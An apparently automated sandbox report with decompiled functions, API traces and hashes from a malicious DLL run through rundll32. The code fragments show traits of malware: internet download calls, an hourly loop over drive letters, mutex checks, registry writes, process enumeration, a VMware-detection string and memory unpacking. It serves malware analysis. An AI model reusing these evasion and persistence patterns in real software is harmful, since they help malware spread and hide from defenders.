            • String ID: TW96aWxsYS81LjAgKFdpbmRvd3M7IFU7IFdpbmRvd3MgTlQgNi4xOyB6aC1DTjsgcnY6MS45LjIuMTUpIEdlY2tvLzIwMTEwMzAzIEZpcmVmb3gvMy42LjE1
            • API String ID: 483802873-1756078650
            • Opcode ID: c6c6c64790840cf0151d658e98ff9a9019296a6371422ff4503929091a591302
            • Instruction ID: ab7613da0529a9e7ad045271e1496bf6998c2837bea1459af3b68005a9a4b910
            • Opcode Fuzzy Hash: c6c6c64790840cf0151d658e98ff9a9019296a6371422ff4503929091a591302
            • Instruction Fuzzy Hash: 3D21C275D0014DBAEF21DB65DC89D9F7BBEDB852D0F20807AF608A6045EA31AA818660
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 67%
            			E10006290(void* __ecx, void* __eflags, void* __fp0, intOrPtr _a4) {
            				void* _t3;
            				void* _t5;
            
            				_t3 = E10003F0A(E10001000(__ecx, __eflags, __fp0, "TW96aWxsYS80LjAgKGNvbXBhdGlibGUp"), 0, 0, 0, 0); // executed
            				_t13 = _t3;
            				if(_t3 != 0) {
            					_t5 = E10003F24(_t13, _a4, 0, 0, 0x80000100, 0); // executed
            					if(_t5 != 0) {
            						_push(_t5);
            					} else {
            						_push(0);
            					}
            					E10003F58();
            					E10003F58(_t13);
            				}
            				return 0;
            			}





            0x100062a4
            0x100062a9
            0x100062b0
            0x100062bf
            0x100062c9
            0x100062ce
            0x100062cb
            0x100062cb
            0x100062cb
            0x100062cf
            0x100062d5
            0x100062db
            0x100062e0

            APIs
              • Part of subcall function 10003F0A: InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C
            • ___crtGetTimeFormatEx.LIBCMT ref: 100062BF
              • Part of subcall function 10003F24: InternetOpenUrlA.WININET(80000100,00000000,00000000,?,00000000,100062C4), ref: 10003F39
            Strings
            • TW96aWxsYS80LjAgKGNvbXBhdGlibGUp, xrefs: 10006298
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InternetOpen$FormatTime___crt
            • String ID: TW96aWxsYS80LjAgKGNvbXBhdGlibGUp
            • API String ID: 1165476586-1918919809
            • Opcode ID: 57b5a40d3fc3883ed3a3a8e113ead5f75d397a2c12f85476ce192d17b168c2e0
            • Instruction ID: e1df23a7d6fc88136f19512af0817ca3ec1a39d4f872029b50130054e15d899c
            • Opcode Fuzzy Hash: 57b5a40d3fc3883ed3a3a8e113ead5f75d397a2c12f85476ce192d17b168c2e0
            • Instruction Fuzzy Hash: 61E0D832D089D238BA33E1671C0ED9F1EBDCBC7AF0B71402DF9489100EE8556485C0B5
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 63%
            			E10008208() {
            				char _v24;
            				void* _t6;
            				intOrPtr _t11;
            				void* _t15;
            				void* _t17;
            				void* _t26;
            
            				while(1) {
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsd");
            					asm("movsw");
            					_t11 = 0;
            					_t17 = 0x18;
            					do {
            						_t6 = L10007F4F(_t15, _t26,  &_v24); // executed
            						if(_t6 != 0) {
            							_push(1);
            							 *0x10017b90 = _t11;
            							_pop(0);
            						}
            						_v24 = _v24 + 1;
            						_t17 = _t17 - 1;
            					} while (_t17 != 0);
            					 *0x10017b94 = 0;
            					do {
            						_t20 = "c:";
            						 *((char*)("c:")) = _t11 + 0x61;
            						if(E1000400A("c:") == 3) {
            							L10007F4F(_t15, _t26, _t20); // executed
            						}
            						_t11 = _t11 + 1;
            					} while (_t11 < 0x1a);
            					Sleep(0x36ee80); // executed
            				}
            			}









            0x10008211
            0x10008219
            0x1000821a
            0x1000821b
            0x1000821c
            0x1000821d
            0x10008221
            0x10008225
            0x10008226
            0x1000822a
            0x10008232
            0x10008234
            0x10008236
            0x1000823c
            0x1000823c
            0x1000823d
            0x10008240
            0x10008240
            0x10008243
            0x10008249
            0x1000824b
            0x10008253
            0x10008261
            0x10008264
            0x10008269
            0x1000826a
            0x1000826b
            0x10008275
            0x10008275

            APIs
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Sleep
            • String ID: C:\Program Files
            • API String ID: 3472027048-1387799010
            • Opcode ID: 9afeee0ed7ce9f56edc86bd1ea08c8183094d24e33545e6115e7320213a91ecd
            • Instruction ID: d64c08f7848b6e56d662ed05996509d3b2f9a4b4559b092b9281e72653b8b67e
            • Opcode Fuzzy Hash: 9afeee0ed7ce9f56edc86bd1ea08c8183094d24e33545e6115e7320213a91ecd
            • Instruction Fuzzy Hash: A1F0AC769046A1AAF601CF940DC15CF77ACFB122A4B101022FA44BA046D7B19E0147E2
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 20%
            			E10006B30(void* __edx, void* _a4) {
            				char _v404;
            				long _t7;
            				void* _t8;
            				void* _t9;
            				void* _t10;
            				void* _t12;
            				void* _t13;
            
            				_t12 = __edx;
            				0x10037c48(_t9, 0x202,  &_v404);
            				_t10 = _a4;
            				 *((intOrPtr*)(_t10 + 0x1214)) = 0;
            				_t13 = E10003ECE(0, 0, _t10);
            				_t7 = GetLastError();
            				if(_t7 != 0xb7) {
            					L1:
            					_t8 = CreateThread(0, 0, E1000687E, _t10, 0, 0); // executed
            					0x10039d58(_t8, 0xffffffff);
            					0x1003c377();
            					_t10 = 0x4e20d0;
            					asm("adc eax, 0x1000e0b0"); // executed
            					goto L1;
            				}
            				0x1002fe96(_t12, _t13);
            				return _t7;
            			}










            0x10006b30
            0x10006b49
            0x10006b4e
            0x10006b56
            0x10006b64
            0x10006b66
            0x10006b70
            0x10006b72
            0x10006b7c
            0x10006b87
            0x10006b8e
            0x10006b98
            0x10006b9a
            0x00000000
            0x10006b9a
            0x10006ba3
            0x10006bac

            APIs
              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA
            • GetLastError.KERNEL32 ref: 10006B66
            • CreateThread.KERNEL32(00000000,00000000,1000687E,?,00000000,00000000), ref: 10006B7C
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Create$ErrorLastMutexThread
            • String ID:
            • API String ID: 2493691075-0
            • Opcode ID: 3af9e7ef5a81bde3ebdb3565e676664ed2f8d6487fc3cc4dfbae9c29a7e1a43f
            • Instruction ID: 6b7b08fd01f8edd59fd4bb6fc29013329b5f4216a97b85f05c55edfd73395ade
            • Opcode Fuzzy Hash: 3af9e7ef5a81bde3ebdb3565e676664ed2f8d6487fc3cc4dfbae9c29a7e1a43f
            • Instruction Fuzzy Hash: 7BF04CB5401264BEE62293715C8ACEF3A6CDF863E1F100035FD08E6146DA249D0182F2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
              • Part of subcall function 10003ECE: CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA
            • GetLastError.KERNEL32 ref: 10006B66
            • CreateThread.KERNEL32(00000000,00000000,1000687E,?,00000000,00000000), ref: 10006B7C
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Create$ErrorLastMutexThread
            • String ID:
            • API String ID: 2493691075-0
            • Opcode ID: e89be578e8148a7335b22e0c9b632b386793c7a30c553ecdde78e1e69eb4abc6
            • Instruction ID: d2b0050193654c84d471cf77aacb88838c46bf9d5c4ba750d0ee673067b4f21b
            • Opcode Fuzzy Hash: e89be578e8148a7335b22e0c9b632b386793c7a30c553ecdde78e1e69eb4abc6
            • Instruction Fuzzy Hash: BFF09CB1401164BEE71297614C8ADEF3A5CDF463E4F144125BD18A618ADA245D5582B2
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualProtect.KERNEL32(?,00001000,00000004,?,?), ref: 026E14D3
            • VirtualProtect.KERNEL32(?,00001000,?,?), ref: 026E14F1
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: ProtectVirtual
            • String ID:
            • API String ID: 544645111-0
            • Opcode ID: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction ID: 9a7e41faaabc4f8ad0b59beb91b3c9e7948ecb3640d0bccf3e735761dfd2c05b
            • Opcode Fuzzy Hash: 333d2feefedeb4a11df68bec21991a956e925db56d9e6a2917b24d5a107d6d0d
            • Instruction Fuzzy Hash: C2F0E933240245AFEF198FA4D885EEE7768DF49398B2001AAF6029E286CA71E651C754
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • Sleep.KERNEL32(0002BF20), ref: 10006AEE
              • Part of subcall function 10006499: wsprintfA.USER32 ref: 100064F7
              • Part of subcall function 10006499: ___crtGetTimeFormatEx.LIBCMT ref: 10006546
            • CreateThread.KERNEL32(00000000,00000000,Function_0000687E,00000000,00000000,00000000), ref: 10006B02
            Strings
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateFormatSleepThreadTime___crtwsprintf
            • String ID: 5762479093
            • API String ID: 1808643731-3483958698
            • Opcode ID: 5756f753bd748c9ff613ad93980cccc3d4190c2db9245a30f4cd3ae4c84e97fb
            • Instruction ID: 6bf354f83ea36040bb280e8402855d4f416a69cdc8a6264a44d46d68baa0750d
            • Opcode Fuzzy Hash: 5756f753bd748c9ff613ad93980cccc3d4190c2db9245a30f4cd3ae4c84e97fb
            • Instruction Fuzzy Hash: 99D0129478421970B061F3F10D07DAF184ECF1A7D17648028FD04B804FE951D51154B3
            Uniqueness

            Uniqueness Score: -1.00%

            APIs
            • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 026E007E
            • VirtualFree.KERNELBASE(00000000,?,00004000), ref: 026E00BE
            Memory Dump Source
            • Source File: 00000004.00000002.772727314.00000000026E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 026E0000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_26e0000_rundll32.jbxd
            Similarity
            • API ID: Virtual$AllocFree
            • String ID:
            • API String ID: 2087232378-0
            • Opcode ID: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction ID: 3c5303772d13a4459492f8952bd9ce34178cb7eb5a8b8752b54c5685d1e88c24
            • Opcode Fuzzy Hash: 65a02cd7260d18a01fc3f7ff89687da28b1d4c2f1c2c8b880b6d82bd0f9a86c6
            • Instruction Fuzzy Hash: 7301A47220A6427EEB318AA19C40F37BBDCDF48712F144C5AFAD6E5190DA65E4418B70
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E1000406C(void* _a4, char* _a8, int _a12, char* _a16, int _a20, int _a24, struct _SECURITY_ATTRIBUTES* _a28, void** _a32, int* _a36) {
            				long _t10;
            
            				_t10 = RegCreateKeyExA(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36); // executed
            				return _t10;
            			}




            0x1000408a
            0x10004091

            APIs
            • RegCreateKeyExA.KERNEL32(?,00000000,000F003F,00000000,?,00000000,00000000,80000001,10006D71,?,10006D71,80000001,00000000,00000000,REG_SZ,00000000), ref: 1000408A
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Create
            • String ID:
            • API String ID: 2289755597-0
            • Opcode ID: 506b09687f3ab7a414a75766b3d3f90481d321aca35c59e901201fc3ba8e4a5b
            • Instruction ID: 2f1a498b2dcbf4f3c3eb6ba8bd5ccb29d644f5d642ac185d28254d8eeb3824b8
            • Opcode Fuzzy Hash: 506b09687f3ab7a414a75766b3d3f90481d321aca35c59e901201fc3ba8e4a5b
            • Instruction Fuzzy Hash: 5BD09B3200015EFBCF025F81DD058DA3F6AFB4C2A9B0A8654FA1824030C776E9B1AB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E100040BA(void* _a4, char* _a8, int _a12, int _a16, void** _a20) {
            				long _t6;
            
            				_t6 = RegOpenKeyExA(_a4, _a8, _a12, _a16, _a20); // executed
            				return _t6;
            			}




            0x100040cc
            0x100040d3

            APIs
            • RegOpenKeyExA.KERNEL32(?,?,?,?,?,?,100044A4,80000000,00000000,00000000,000F003F,?,QXBwbGljYXRpb25zXFxWTXdhcmVIb3N0T3Blbi5leGU=,?,100087CD), ref: 100040CC
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: Open
            • String ID:
            • API String ID: 71445658-0
            • Opcode ID: 4a8faa62bcfb3270353cf14121b101114a74a138e05c17fcdee85730a6dc741a
            • Instruction ID: 325a12e481168666c7c0c00c36f8af78d7d871d703ad2c0798f43e35c83d2956
            • Opcode Fuzzy Hash: 4a8faa62bcfb3270353cf14121b101114a74a138e05c17fcdee85730a6dc741a
            • Instruction Fuzzy Hash: A1C0013200060EFBDF025F91EC05CDA3F3AFB182A1B008020FA2804030C773D9B1AB91
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003F0A(char* _a4, long _a8, char* _a12, char* _a16, long _a20) {
            				void* _t6;
            
            				_t6 = InternetOpenA(_a4, _a8, _a12, _a16, _a20); // executed
            				return _t6;
            			}




            0x10003f1c
            0x10003f23

            APIs
            • InternetOpenA.WININET(?,00000000,FFFFFAE1,FFFFFAE1,10006ED5), ref: 10003F1C
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: InternetOpen
            • String ID:
            • API String ID: 2038078732-0
            • Opcode ID: 6ebc564339288df785ab319f2eef5fd975c9d2bdaaabd508592ec2c4882c7e5c
            • Instruction ID: 3b8007e0c36ccf4b72e51ff36ba8b6d098d3d00fbcb84495eb87ae2067493b1e
            • Opcode Fuzzy Hash: 6ebc564339288df785ab319f2eef5fd975c9d2bdaaabd508592ec2c4882c7e5c
            • Instruction Fuzzy Hash: BFC0EC3200020EBBDF025F91EC0589A7F2AEB082A0B008010FA2804021C7339971AB95
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003ECE(struct _SECURITY_ATTRIBUTES* _a4, int _a8, CHAR* _a12) {
            				void* _t4;
            
            				_t4 = CreateMutexA(_a4, _a8, _a12); // executed
            				return _t4;
            			}




            0x10003eda
            0x10003ee0

            APIs
            • CreateMutexA.KERNEL32(?,?,?,10006B61,00000000,00000000,?,?,00000202,?), ref: 10003EDA
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: CreateMutex
            • String ID:
            • API String ID: 1964310414-0
            • Opcode ID: b0445fb2c580dfef0359de022438c5cf869d669a1619e2cffc7a985e78b4f379
            • Instruction ID: 0660ba76b91c4ba90ad6f84dc9e800b0fcc5abeceff4b92d4c6b7b19770fb62c
            • Opcode Fuzzy Hash: b0445fb2c580dfef0359de022438c5cf869d669a1619e2cffc7a985e78b4f379
            • Instruction Fuzzy Hash: 14B0097A408210BFDF025B90DD4880ABBA2BB88362F24C958F6A941031C732C520EB02
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10003FF7(CHAR* _a4, CHAR* _a8, long _a12) {
            				long _t4;
            
            				_t4 = GetShortPathNameA(_a4, _a8, _a12); // executed
            				return _t4;
            			}




            0x10004003
            0x10004009

            APIs
            • GetShortPathNameA.KERNEL32(?,?,?), ref: 10004003
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: NamePathShort
            • String ID:
            • API String ID: 1295925010-0
            • Opcode ID: 4d5884627ad890fc19a7fce987e6ff622a4b63b76918a6086ce94622cf65f669
            • Instruction ID: 9ed1efb17d4bc623500ef1ea71d91a7222f1847b1b215a14ca4852d72f61d6bf
            • Opcode Fuzzy Hash: 4d5884627ad890fc19a7fce987e6ff622a4b63b76918a6086ce94622cf65f669
            • Instruction Fuzzy Hash: 0DB0097A509210BFDF025B91DE5881ABFB2AB88321F50C95CF6A940031C7328520EB02
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10004104(void* _a4, struct tagPROCESSENTRY32W _a8) {
            				int _t3;
            
            				_t3 = Process32First(_a4, _a8); // executed
            				return _t3;
            			}




            0x1000410c
            0x10004112

            APIs
            • Process32First.KERNEL32(00000000,00000000), ref: 1000410C
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: FirstProcess32
            • String ID:
            • API String ID: 2623510744-0
            • Opcode ID: e67c12039c6e27c9775ed2303caa81bdaef1dde80995cd1ad643f76d7915693a
            • Instruction ID: c9858dfc005bbdb7cb3bc2a9c9cd704bcf097683957f92dac5198df2e9f65fac
            • Opcode Fuzzy Hash: e67c12039c6e27c9775ed2303caa81bdaef1dde80995cd1ad643f76d7915693a
            • Instruction Fuzzy Hash: FCA00275505512ABDA515B51CD4484AFF61BBD4341F01C415F18940034C7359465DB11
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10004115(void* _a4, struct tagPROCESSENTRY32W _a8) {
            				int _t3;
            
            				_t3 = Process32Next(_a4, _a8); // executed
            				return _t3;
            			}




            0x1000411d
            0x10004123

            APIs
            • Process32Next.KERNEL32(00000000,00000000), ref: 1000411D
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: NextProcess32
            • String ID:
            • API String ID: 1850201408-0
            • Opcode ID: a3f922a5f824779d2e4fb6a0605a006c2019e83fe50e179df1dbe93f5432c8bc
            • Instruction ID: 61c727c5f78705df26fed0ca172bffc95c0448491f66f63664d3ec9bbd55d41d
            • Opcode Fuzzy Hash: a3f922a5f824779d2e4fb6a0605a006c2019e83fe50e179df1dbe93f5432c8bc
            • Instruction Fuzzy Hash: B4A00136408612ABDA52AB50CD4888ABFA2BBE8381F11C819F18A41034C73694A5EB12
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E1000400A(CHAR* _a4) {
            				int _t2;
            
            				_t2 = GetDriveTypeA(_a4); // executed
            				return _t2;
            			}




            0x1000400e
            0x10004014

            APIs
            • GetDriveTypeA.KERNEL32(?,1000825D,1001594C), ref: 1000400E
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778004118.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778015100.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778026036.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778052577.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000004.00000002.778067342.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_4_2_10000000_rundll32.jbxd
            Similarity
            • API ID: DriveType
            • String ID:
            • API String ID: 338552980-0
            • Opcode ID: 910e139e7f72f3dc7016df4695e01adbd10b1f6739a032fc72a57664e309aaef
            • Instruction ID: 35e6a258e9880390de709bccb697b72c0b050f0fde384497e413ae747a6bc5b2
            • Opcode Fuzzy Hash: 910e139e7f72f3dc7016df4695e01adbd10b1f6739a032fc72a57664e309aaef
            • Instruction Fuzzy Hash: B29002304042109BDE015B10CE4D4097BA1AB84701B00C454F05540131C7328914EA01
            Uniqueness

            Uniqueness Score: -1.00%

            C-Code - Quality: 100%
            			E10004092(void* _a4) {
            				long _t2;
            
            				_t2 = RegCloseKey(_a4); // executed
            				return _t2;
            			}




            0x10004096
            0x1000409c

            APIs
            • RegCloseKey.KERNEL32(?,10006DCF,?), ref: 10004096
            Memory Dump Source
            • Source File: 00000004.00000002.777987828.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true
            • Associated: 00000004.00000002.777978592.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
